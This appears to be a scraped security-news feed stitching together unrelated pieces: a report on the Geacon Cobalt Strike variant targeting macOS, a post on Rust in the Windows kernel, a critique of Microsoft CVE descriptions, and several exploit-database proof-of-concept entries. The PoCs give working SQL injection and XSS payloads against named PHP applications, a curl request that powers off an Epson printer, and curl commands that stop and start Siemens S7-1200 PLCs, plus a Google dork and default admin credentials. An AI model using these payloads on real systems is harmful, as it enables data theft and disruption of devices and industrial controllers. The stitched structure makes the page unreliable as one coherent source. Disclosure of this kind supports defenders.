A Golang implementation of Cobalt Strike called Geacon is likely to garner the attention of threat actors looking to target Apple macOS systems.
The findings come from SentinelOne, which observed an uptick in the number of Geacon payloads appearing on VirusTotal in recent months.
"While some of these are likely red-team operations, others bear the characteristics of genuine malicious attacks,"

Endpoint Security / Cyber Threat

A Golang implementation of Cobalt Strike called Geacon is likely to garner the attention of threat actors looking to target Apple macOS systems.

The findings come from SentinelOne, which observed an uptick in the number of Geacon payloads appearing on VirusTotal in recent months.

"While some of these are likely red-team operations, others bear the characteristics of genuine malicious attacks," security researchers Phil Stokes and Dinesh Devadoss said in a report.

Cobalt Strike is a well-known red teaming and adversary simulation tool developed by Fortra. Owing to its myriad post-exploitation capabilities, illegally cracked versions of the software have been abused by threat actors over the years.

While post-exploitation activity associated with Cobalt Strike has primarily singled out Windows, such attacks against macOS are something of a rarity.

In May 2022, software supply chain firm Sonatype disclosed details of a rogue Python package called "pymafka" that was designed to drop a Cobalt Strike Beacon onto compromised Windows, macOS, and Linux hosts.

That may, however, change with the emergence of Geacon artifacts in the wild. Geacon is a Go variant of Cobalt Strike that has been available on GitHub since February 2020.

Further analysis of two new VirusTotal samples that were uploaded in April 2023 has traced their origins to two Geacon variants (geacon\_plus and geacon\_pro) that were developed in late October by two anonymous Chinese developers z3ratu1 and H4de5.

The geacon\_pro project is no longer accessible on GitHub, but an Internet Archive snapshot captured on March 6, 2023, reveals its ability to bypass antivirus engines such as Microsoft Defender, Kaspersky, and Qihoo 360 360 Core Crystal.

H4de5, the developer behind geacon\_pro, claims the tool is mainly designed to support CobaltStrike versions 4.1 and later, while geacon\_plus supports CobaltStrike version 4.0. The current version of the software is 4.8.

Xu Yiqing's Resume\_20230320.app, one of the artifacts discovered by SentinelOne, employs a run-only AppleScript to reach out to a remote server and download a Geacon payload. It's compatible with both Apple silicon and Intel architectures.

"The unsigned Geacon payload is retrieved from an IP address in China," the researchers said. "Before it begins its beaconing activity, the user is presented with a two-page decoy document embedded in the Geacon binary. A PDF is opened displaying a resume for an individual named 'Xu Yiqing.'"

The Geacon binary, compiled from the geacon\_plus source code, packs a multitude of functions that allows it to download next-stage payloads and exfiltrate data, and facilitate network communications.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The second sample, per the cybersecurity firm, is embedded within a trojanized app that masquerades as the SecureLink remote support app (SecureLink.app) and mainly targets Intel devices.

The barebones, unsigned application requests for users' permission to access contacts, photos, reminders, as well as the device's camera and microphone. Its main component is a Geacon payload built from the geacon\_pro project that connects to a known command-and-control (C2) server in Japan.

The development comes as the macOS ecosystem is being targeted by a wide variety of threat actors, including state-sponsored groups, to deploy backdoors and information stealers.

"The uptick in Geacon samples over the last few months suggests that security teams should be paying attention to this tool and ensuring that they have protections in place."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using Golang Variant of Cobalt Strike to Target Apple macOS Systems

Categories: News
Tags: Windows 11

Tags:  OS

Tags:  operating system

Tags:  programming language

Tags:  rust

Tags:  C

Tags:  C++

Tags:  kernel

Tags:  buffer overflow

We take a look at the slow introduction of programming language Rust into the Windows 11 kernel in an effort to make it more memory safe.



(Read more...)




The post Windows 11 is showing its first signs of Rust appeared first on Malwarebytes Labs.

Some important changes are heading to Windows which should make the operating system quite a bit more secure than it is now. At the end of April, Microsoft’s VP of OS Security and Enterprise referenced upcoming changes to Windows involving the programming language Rust.

Rust matches the performance of languages like C and C++ while being easier to debug and maintain, and—most importantly—memory safe. It is highly desired by some programmers—you can see his excitement in the below talk from Blue Hat IL 2023:

At the time, he cautioned that “rewriting Windows in Rust isn’t going to happen anytime soon”. However, he also mentioned that Rust would be making an appearance in the operating system’s Kernel “in the next several weeks or months”.

That moment has now arrived for folks on the Windows 11 Insider program:

> If you're on the Win11 Insider ring, you're getting the first taste of Rust in the Windows kernel! pic.twitter.com/uyZkK2vRLY
> 
> — Mark Russinovich (@markrussinovich) May 10, 2023

Why is this such good news? Well, the kernel is the core component of a computer operating system and is crucial to how it functions. It's one of the first things to fire up when a computer is switched on, and then it sits in memory permanently, mediating between the computer's applications and hardware.

If an attacker successfully compromises a kernel, they can expect to have full control over the device it's running on, which is of course very bad indeed. These issues aren’t just Windows specific—you can end up with a kernel disaster on a Mac, or over in Linux land, too.

A big part of kernel exploitation is focused on memory management. Traditionally, the most popular coding languages for kernels have been C and C++, which provide excellent performance and lots of flexibility, and a lot of rope to hang yourself with when it comes to security. When people with bad intentions stroll into town, one of the key places they prod around is in the realm of memory. Bugs and errors in this area can lead to exploitation, and making the memory unstable can cause malfunctions or allow for malicious code.

A huge part of this is the dreaded buffer overflow attack, which has been around since the 1970s. This is when data written to a buffer spills out and overwrites nearby memory. When the system’s memory is tampered with in this way it can lead to all manner of exploitation.

Despite endless attempts to get programmers to write more secure code, improvements to the underlying languages, and mitigations like Windows Address Space Layout Randomization (ASLR), buffer overflows continue to be a huge problem. The only way to root them out completely is to switch away from C and C++ to a memory safe language like Rust that can manage memory automatically.

This approach has already proven to be more reliable than hoping programmers will do the right thing: The adoption of memory safe languages in Android, which predates Windows by several years, has lead to signficiant decline in memory safety vulnerabilities on that platform.

According to Google, in situations where Rust has been used on low-level Android components instead of C++, there have been "zero memory safety vulnerabilities discovered."

The work of switching out C++ for Rust in Windows 11 has already begun. As per The Register, the Microsoft Windows graphics interface device is currently being ported to Rust to the tune of 36,000 lines of Rust code, and there’s a system call (SysCall) in the Windows kernel right now which is implemented in Rust.

While the “wouldn’t it be nice” dream of replacing all pieces of C and C++ in Windows with safer, better alternatives is likely impossible, big and important strides in memory safety are finally being made. What we have here is yet another good reason to finally make the leap from Windows 10 to 11.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Windows 11 is showing its first signs of Rust

SQL injection vulnerability found in Judging Management System v.1.0 allows a remote attacker to execute arbitrary code via the crit_id parameter of the edit_criteria.php file.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: qingning988

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/edit\_criteria.php?crit\_id=

Vulnerability location: /php-jms/edit\_criteria.php?crit\_id=, crit\_id

dbname =jms\_db

\[+\] Payload: /php-jms/edit\_criteria.php?crit\_id=-1%27%20union%20select%201,2,database(),4,5--+ // Leak place ---> crit\_id

GET /php\-jms/edit\_criteria.php?crit\_id\=\-1%27%20union%20select%201,2,database(),4,5\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

CVE-2023-30245: cve_report/SQLi-1.md at main · qingning988/cve_report

RockMongo version 1.1.7 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)# Discovery by: Rafael Pedrero# Discovery Date: 2020-09-19# Vendor Homepage: https://github.com/iwind/rockmongo/# Software Link : https://github.com/iwind/rockmongo/# Tested Version: 1.1.7# Tested on:  Windows 7 and 10# Vulnerability Type: Stored Cross-Site Scripting (XSS)CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: RockMongo v1.1.7, does not sufficiently encodeuser-controlled inputs, resulting in a stored and reflected Cross-SiteScripting (XSS) vulnerability via the index.php, in multiple parameter.Proof of concept:Stored:POST https://localhost/mongo/index.php?action=db.newCollection&db=localHTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 69Origin: https://localhostConnection: keep-aliveReferer: https://localhost/mongo/index.php?action=db.newCollection&db=localCookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es;rock_format=jsonUpgrade-Insecure-Requests: 1Host: localhostname=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0Reflected:https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_loghttps://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3Ehttps://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3Ehttp://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAllhttp://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAllhttp://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAllPOST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 109Origin: https://localhostAuthorization: Basic cm9vdDpyb290Connection: keep-aliveReferer: https://localhost/mongo/index.php?action=login.index&host=0Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;rock_format=jsonUpgrade-Insecure-Requests: 1Host: localhostmore=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 109Origin: https://localhostAuthorization: Basic cm9vdDpyb290Connection: keep-aliveReferer: https://localhost/mongo/index.php?action=server.command&Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;rock_format=jsonUpgrade-Insecure-Requests: 1Host: localhostcommand=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=jsonPOST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 140Origin: https://localhostAuthorization: Basic cm9vdDpyb290Connection: keep-aliveReferer: https://localhost/mongo/index.php?action=server.execute&Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;rock_format=jsonUpgrade-Insecure-Requests: 1Host: localhostcode=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

RockMongo 1.1.7 Cross Site Scripting

TinyWebGallery version 2.5 suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)#Application: TinyWebGallery#Version: v2.5#Bugs:  Stored Xss#Technology: PHP#Vendor URL: http://www.tinywebgallery.com/#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest#Date of found: 07-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Login to account2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg3. Edit 4. Set folder name section as  <script>alert(4)</script>Request :POST /twg25/i_frames/i_titel.php HTTP/1.1Host: localhostContent-Length: 264Cache-Control: max-age=0sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpgAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766kConnection: closetwg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save5. Go to http://localhost/twg25/index.php

TinyWebGallery 2.5 Cross Site Scripting

Epson Stylus SX510W suffers from a power off denial of service vulnerability.

    # Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)# Discovery by: Rafael Pedrero# Discovery Date: 2020-05-16# Vendor Homepage: https://www.epson.es/# Software Link :https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0# Tested on: Linux/Windows# Vulnerability Type: Denial of Service (DoS)1. DescriptionThe vulnerability occurs when 2 or more &'s are sent to the server in a row("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.2. Proof of ConceptRequest:curl -s "http://<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"3. Solution:This version product is deprecated.-->

Epson Stylus SX510W Denial Of Service

Siemens SIMATIC S7-1200 CPU start/stop command cross site request forgery exploit. This older issue elaborates on t4rkd3vilz's CVE-2015-5698 by issuing a POST command to a specified web server path.

    # Exploit Title: Siemens SIMATIC S7-1200 CPU Start/Stop Command- Cross-Site Request Forgery# Google Dork: inurl:/Portal/Portal.mwsl# Date: 2022-03-24# Exploit Author: RoseSecurity# Vendor Homepage: https://www.siemens.com/global/en.html# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3# Tested on: Kali Linux# CVE: CVE-2015-5698# IP == PLC IP address# Start Commandcurl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http://<IP>/CPUCommands'# Stop Commandcurl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http://<IP>/CPUCommands'

Siemens SIMATIC S7-1200 Cross Site Request Forgery

Online Clinic Management System version 2.2 suffers from multiple persistent cross site scripting vulnerabilities.

# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)  
# Date: 27-06-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: https://bigprof.com  
# Software Download Link :  
https://bigprof.com/appgini/applications/online-clinic-management-system  
# Version : 2.2  
# Category: Webapps  
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits  
# CVE :  
# Category: webapps

# Vulnerability Type: Stored Cross-Site Scripting

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)  
vulnerability via the /clinic/medical_records_view.php, in FirstRecord  
parameter, GET and POST request.

2. Proof of Concept

GET:  
http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

POST:  
POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: multipart/form-data;  
boundary=---------------------------1512016725878  
Content-Length: 1172  
Origin: https://127.0.0.1  
Connection: keep-alive  
Referer: https://127.0.0.1/clinic/medical_records_view.php  
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4;  
online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]  
Upgrade-Insecure-Requests: 1  
Host: 127.0.0.1

-----------------------------1512016725878  
Content-Disposition: form-data; name="current_view"

DVP  
-----------------------------1512016725878  
Content-Disposition: form-data; name="SortField"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SelectedID"

1  
-----------------------------1512016725878  
Content-Disposition: form-data; name="SelectedField"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SortDirection"

-----------------------------1512016725878  
Content-Disposition: form-data; name="FirstRecord"

"><script>alert(1);</script>  
-----------------------------1512016725878  
Content-Disposition: form-data; name="NoDV"

-----------------------------1512016725878  
Content-Disposition: form-data; name="PrintDV"

-----------------------------1512016725878  
Content-Disposition: form-data; name="DisplayRecords"

all  
-----------------------------1512016725878  
Content-Disposition: form-data; name="patient"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SearchString"

-----------------------------1512016725878--

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)  
vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

And Reflected Cross-Site Scripting (XSS) too.  
# Vulnerability Type: Reflected Cross-Site Scripting

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)  
vulnerability via the /clinic/events_view.php, in FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)  
vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord  
parameter.

2. Proof of Concept

http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

Online Clinic Management System 2.2 Cross Site Scripting

A predictable patch cadence is nice, but the software giant can do more.

As the 20th anniversary of Patch Tuesday approaches later this year, many are reflecting on the importance of the program that brought predictability to Microsoft security patch cycles. Patch Tuesday undoubtedly improved the security of customers, and the success of the program is reflected in the number of organizations that established their own Patch Tuesdays, including Adobe, Siemens, Schneider Electric, and more.

However, the quality of the vulnerability details published by Microsoft on Patch Tuesday has noticeably declined. Vulnerability descriptions used to be useful. Now they are reduced to being nearly meaningless. Compare, for example, the CVE descriptions in the National Vulnerability Database (NVD) for CVE-2017-0290 and CVE-2023-21554 (aka QueueJumper):

_**CVE-2017-0290 NVD Vulnerability Description**_

_The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 does not properly scan a specially crafted file leading to memory corruption, aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability."_

_**CVE-2023-21554 Vulnerability Description**_

_Microsoft Message Queuing Remote Code Execution Vulnerability_

The first description details the affected components (Forefront and Defender), the affected versions (various Windows operating systems), the attack vector (crafted file), and a bug class (memory corruption). The second description lacks almost all of those details.

This is not an isolated case. In fact, Microsoft's CVE descriptions have been on the decline for a number of years. The following graph maps the median length of Microsoft-created CVE descriptions over the past 20 years:

    

Source: Jacob Baines

**Impact on Defenders**

The poor descriptions have a serious impact on practitioners. It's difficult to prioritize vulnerabilities when it's unclear what the problems are. How is anyone supposed to know if Microsoft Message Queuing Remote Code Execution Vulnerability is a big deal or not? How many practitioners know what Microsoft Message Queuing is, or what major pieces of software use it? Is it enabled by default? Does it listen on a network port? The practitioner is forced to go looking for all this information themselves.

To avoid that type of thing, MITRE created well-defined rules for what is required in a CVE description. These are the minimum requirements:

_8.2.1 MUST provide enough information for a reader to have a reasonable understanding of what products are affected._

_8.2.3 MUST include one of the following:_

_1\. Vulnerability Type_

_2\. Root Cause_

_3\. Impact_

**Does Microsoft Message Queuing Remote Code Execution Vulnerability Satisfy These Requirements?**

Maybe a very loose interpretation of 8.2.3 would be satisfied with Code Execution Vulnerability. But can anyone reasonably say that "Microsoft Message Queuing" describes the affected products?

At least Microsoft included a specific service for CVE-2023-21554 (Message Queuing). It didn't even do that for CVE-2023-23415. That description doesn't list any software, and instead opts to list an affected protocol:

_**CVE-2023-23415 Vulnerability Description**_

_Internet Control Message Protocol (ICMP) Remote Code Execution Vulnerability_

**CWE Assigned to Microsoft CVE**

It's unclear why MITRE allows Microsoft to ignore (or, generously, skirt) the CVE description rules. What is clear is that everyone else is worse off because of it. If appealing to the overburdened practitioner isn't enough, we can actually measure the impact of Microsoft's bad CVE descriptions on NIST's per CVE common weakness enumeration (CWE) ID assignment.

For every CVE in NIST's NVD, it attempts to assign a CWE. When the vulnerability contains insufficient information to assign any specific CWE, then NIST assigns NVD-CWE-noinfo. Basically, "this CVE has insufficient details for us to know what the weakness is."

Back in 2015, NIST assigned NVD-CWE-noinfo to only a few Microsoft CVEs. In 2022, the majority of Microsoft CVEs received the NVD-CWE-noinfo designation.

    

Source: Jacob Baines

NIST's effort to assign CWE to each CVE helps with vulnerability prioritization and makes it easier to map vulnerabilities to CAPEC and/or MITRE ATT&CK. NVD CWE are used by a host of downstream projects, including MITRE's own CWE Top 25. Recent Microsoft vulnerabilities are largely excluded from these activities, because Microsoft has chosen to provide insufficient information to even assign a CWE to its vulnerabilities.

Unfortunately, it's not as if the information can be found in the Microsoft advisory itself, either. In fact, practitioners need to refer to outside sources, because Microsoft doesn't keep its advisories up to date. For example, both CVE-2022-41080 and CVE-2019-1388 were added to the Cybersecurity and Infrastructure Security Agency Known Exploited Vulnerabilities Catalog in 2023. Microsoft's NVD entries correctly reflect that. But both Microsoft advisories state that the vulnerabilities haven't been "exploited." That's because its advisories only reflect exploitation at the time of publication.

**Microsoft Advisory Exploitability Table for CVE-2019-1388**

    

The result is that Microsoft's advisory is both out of date and lacks information. The NVD entry is up to date, but also lacks information. Thankfully, there are a host of third parties trying to plug the information gap. For example, Zero Day Initiative publishes a rundown of every Patch Tuesday. This is its description of CVE-2023-21554 (aka QueueJumper):

_This is a CVSS 9.8 bug and receives Microsoft's highest exploitability rating. It allows a remote, unauthenticated attacker to run their code with elevated privileges on affected servers with the Message Queuing service enabled. This service is disabled by default but is commonly used by many contact center applications. It listens to TCP port 1801 by default, so blocking this at the perimeter would prevent external attacks. However, it's not clear what impact this may have on operations. Your best option is to test and deploy the update._

This description contains important information that the CVE entry does not, such as:

1\. Message Queuing is a service.

2\. Message Queuing is disabled by default.

3\. Message Queuing listens on TCP port 1801.

4\. Exploitation may result in elevated privileges.

All of that is incredibly useful for defenders — information that should have appeared in the CVE dictionary and the NVD entry, but doesn't. This is information that belongs in the CVE catalog for context, vulnerability prioritization, and historical safekeeping. Instead, already time-constrained defenders are put at a disadvantage because they're forced to go hunting for third-party descriptions of every Microsoft vulnerability.

**Conclusion

Microsoft's Patch Tuesday is almost old enough to drink, but that isn't reflected in the maturity of the program. A predictable patch cadence is nice, but the associated information produced by Microsoft is bad and has been trending that way for years. Microsoft can do much more, and it owes the community as much. Eight-word vulnerability descriptions should not and cannot be the norm.

**

Microsoft Advisories Are Getting Worse

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_class.php?id=.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_class.php?id=

Vulnerability location: /eval/admin/manage\_class.php?id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_class.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_class.php?id\=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

Tag

#windows